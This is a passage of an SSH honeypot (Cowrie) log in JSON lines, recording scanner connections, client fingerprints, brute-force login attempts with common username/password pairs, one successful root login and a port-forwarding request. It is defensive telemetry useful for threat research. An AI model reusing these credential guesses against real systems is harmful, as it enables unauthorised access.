sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:18:34.849814Z","src_ip":"41.226.27.251","session":"2703f41f20ef"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52578,"dst_ip":"1.2.3.4","dst_port":22,"session":"8dd6fd9232f6","protocol":"ssh","message":"New connection: 212.227.235.229:52578 (1.2.3.4:22) [session: 8dd6fd9232f6]","sensor":"my-vps","timestamp":"2025-08-31T03:18:34.948784Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:18:34.949694Z","src_ip":"212.227.235.229","session":"8dd6fd9232f6"}
{"eventid":"cowrie.login.failed","username":"dev","password":"123456","message":"login attempt [dev/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T03:18:34.999108Z","src_ip":"41.226.27.251","session":"2703f41f20ef"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-31T03:18:35.266969Z","src_ip":"212.227.235.229","session":"8dd6fd9232f6"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:18:35.728927Z","src_ip":"212.227.125.160","session":"e697d5c1b480"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:18:36.265569Z","src_ip":"41.226.27.251","session":"2703f41f20ef"}
{"eventid":"cowrie.login.failed","username":"app","password":"app123","message":"login attempt [app/app123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:18:37.491629Z","src_ip":"212.227.235.229","session":"b2cad985507f"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:18:38.993417Z","src_ip":"212.227.125.160","session":"57ca1ad02829"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:18:39.077833Z","src_ip":"212.227.125.160","session":"57ca1ad02829"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48736,"dst_ip":"1.2.3.4","dst_port":22,"session":"7d6803c24c06","protocol":"ssh","message":"New connection: 212.227.125.160:48736 (1.2.3.4:22) [session: 7d6803c24c06]","sensor":"my-vps","timestamp":"2025-08-31T03:18:40.065840Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:18:40.067019Z","src_ip":"212.227.125.160","session":"7d6803c24c06"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49006,"dst_ip":"1.2.3.4","dst_port":22,"session":"566bace3e636","protocol":"ssh","message":"New connection: 212.227.125.160:49006 (1.2.3.4:22) [session: 566bace3e636]","sensor":"my-vps","timestamp":"2025-08-31T03:18:40.180793Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:18:40.181573Z","src_ip":"212.227.125.160","session":"566bace3e636"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-31T03:18:40.295502Z","src_ip":"212.227.125.160","session":"566bace3e636"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:18:40.640038Z","src_ip":"212.227.125.160","session":"566bace3e636"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-31T03:18:40.755114Z","session":"566bace3e636"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58282,"dst_ip":"1.2.3.4","dst_port":22,"session":"d0eb97b60e36","protocol":"ssh","message":"New connection: 212.227.235.229:58282 (1.2.3.4:22) [session: d0eb97b60e36]","sensor":"my-vps","timestamp":"2025-08-31T03:18:41.487150Z"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:18:42.951507Z","src_ip":"212.227.235.229","session":"8dd6fd9232f6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41900,"dst_ip":"1.2.3.4","dst_port":23,"session":"dcc97bee9e24","protocol":"telnet","message":"New connection: 212.227.125.160:41900 (1.2.3.4:23) [session: dcc97bee9e24]","sensor":"my-vps","timestamp":"2025-08-31T03:18:47.792362Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52678,"dst_ip":"1.2.3.4","dst_port":22,"session":"32f952739537","protocol":"ssh","message":"New connection: 212.227.125.160:52678 (1.2.3.4:22) [session: 32f952739537]","sensor":"my-vps","timestamp":"2025-08-31T03:18:48.915853Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:18:48.916874Z","src_ip":"212.227.125.160","session":"32f952739537"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T03:18:49.214625Z","src_ip":"212.227.125.160","session":"32f952739537"}
{"eventid":"cowrie.login.failed","username":"jacob","password":"1qaz2wsx#EDC","message":"login attempt [jacob/1qaz2wsx#EDC] failed","sensor":"my-vps","timestamp":"2025-08-31T03:18:50.287613Z","src_ip":"212.227.125.160","session":"32f952739537"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:18:51.545487Z","src_ip":"212.227.125.160","session":"32f952739537"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":37220,"dst_ip":"1.2.3.4","dst_port":22,"session":"91ef84de7baa","protocol":"ssh","message":"New connection: 41.226.27.251:37220 (1.2.3.4:22) [session: 91ef84de7baa]","sensor":"my-vps","timestamp":"2025-08-31T03:18:55.142241Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:18:55.143213Z","src_ip":"41.226.27.251","session":"91ef84de7baa"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:18:55.191036Z","src_ip":"41.226.27.251","session":"91ef84de7baa"}
{"eventid":"cowrie.login.failed","username":"oscar","password":"123456","message":"login attempt [oscar/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T03:18:55.334277Z","src_ip":"41.226.27.251","session":"91ef84de7baa"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:18:56.675532Z","src_ip":"41.226.27.251","session":"91ef84de7baa"}
{"eventid":"cowrie.session.closed","duration":"66.7","message":"Connection lost after 66.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:18:59.353196Z","src_ip":"212.227.235.229","session":"b2cad985507f"}
{"eventid":"cowrie.session.closed","duration":"23.5","message":"Connection lost after 23.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:19:04.980638Z","src_ip":"212.227.235.229","session":"d0eb97b60e36"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":48615,"dst_ip":"1.2.3.4","dst_port":22,"session":"87ad9f11baea","protocol":"ssh","message":"New connection: 80.94.95.15:48615 (1.2.3.4:22) [session: 87ad9f11baea]","sensor":"my-vps","timestamp":"2025-08-31T03:19:07.336776Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T03:19:07.337856Z","src_ip":"80.94.95.15","session":"87ad9f11baea"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T03:19:07.389399Z","src_ip":"80.94.95.15","session":"87ad9f11baea"}
{"eventid":"cowrie.login.failed","username":"pritchard","password":"123456","message":"login attempt [pritchard/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T03:19:07.676784Z","src_ip":"80.94.95.15","session":"87ad9f11baea"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54038,"dst_ip":"1.2.3.4","dst_port":22,"session":"30ed52aa1cd4","protocol":"ssh","message":"New connection: 212.227.235.229:54038 (1.2.3.4:22) [session: 30ed52aa1cd4]","sensor":"my-vps","timestamp":"2025-08-31T03:19:08.656383Z"}
{"eventid":"cowrie.login.failed","username":"pritchard","password":"abc123","message":"login attempt [pritchard/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:19:08.734887Z","src_ip":"80.94.95.15","session":"87ad9f11baea"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:19:09.629340Z","src_ip":"212.227.235.229","session":"30ed52aa1cd4"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:19:09.630017Z","src_ip":"212.227.235.229","session":"30ed52aa1cd4"}
{"eventid":"cowrie.login.failed","username":"pritchard","password":"abcd123","message":"login attempt [pritchard/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:19:09.788666Z","src_ip":"80.94.95.15","session":"87ad9f11baea"}
{"eventid":"cowrie.login.failed","username":"pritchard","password":"abcd1234","message":"login attempt [pritchard/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-31T03:19:10.841930Z","src_ip":"80.94.95.15","session":"87ad9f11baea"}
{"eventid":"cowrie.login.failed","username":"pritchard","password":"abc1234","message":"login attempt [pritchard/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-31T03:19:11.895603Z","src_ip":"80.94.95.15","session":"87ad9f11baea"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:19:12.949769Z","src_ip":"80.94.95.15","session":"87ad9f11baea"}
{"eventid":"cowrie.login.failed","username":"git","password":"letmein","message":"login attempt [git/letmein] failed","sensor":"my-vps","timestamp":"2025-08-31T03:19:15.288692Z","src_ip":"212.227.235.229","session":"30ed52aa1cd4"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":50930,"dst_ip":"1.2.3.4","dst_port":22,"session":"6028e7c29967","protocol":"ssh","message":"New connection: 41.226.27.251:50930 (1.2.3.4:22) [session: 6028e7c29967]","sensor":"my-vps","timestamp":"2025-08-31T03:19:15.556705Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:19:15.557986Z","src_ip":"41.226.27.251","session":"6028e7c29967"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:19:15.602170Z","src_ip":"41.226.27.251","session":"6028e7c29967"}
{"eventid":"cowrie.login.failed","username":"dolphinscheduler","password":"dolphinscheduler123","message":"login attempt [dolphinscheduler/dolphinscheduler123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:19:15.737975Z","src_ip":"41.226.27.251","session":"6028e7c29967"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:19:17.042472Z","src_ip":"41.226.27.251","session":"6028e7c29967"}
{"eventid":"cowrie.session.closed","duration":"8.4","message":"Connection lost after 8.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:19:17.081385Z","src_ip":"212.227.235.229","session":"30ed52aa1cd4"}
{"eventid":"cowrie.login.failed","username":"tools","password":"tools","message":"login attempt [tools/tools] failed","sensor":"my-vps","timestamp":"2025-08-31T03:19:28.747828Z","src_ip":"212.227.125.160","session":"57ca1ad02829"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44138,"dst_ip":"1.2.3.4","dst_port":22,"session":"a1fdfbfb97dc","protocol":"ssh","message":"New connection: 212.227.125.160:44138 (1.2.3.4:22) [session: a1fdfbfb97dc]","sensor":"my-vps","timestamp":"2025-08-31T03:19:29.859249Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:19:30.271116Z","src_ip":"212.227.125.160","session":"a1fdfbfb97dc"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","h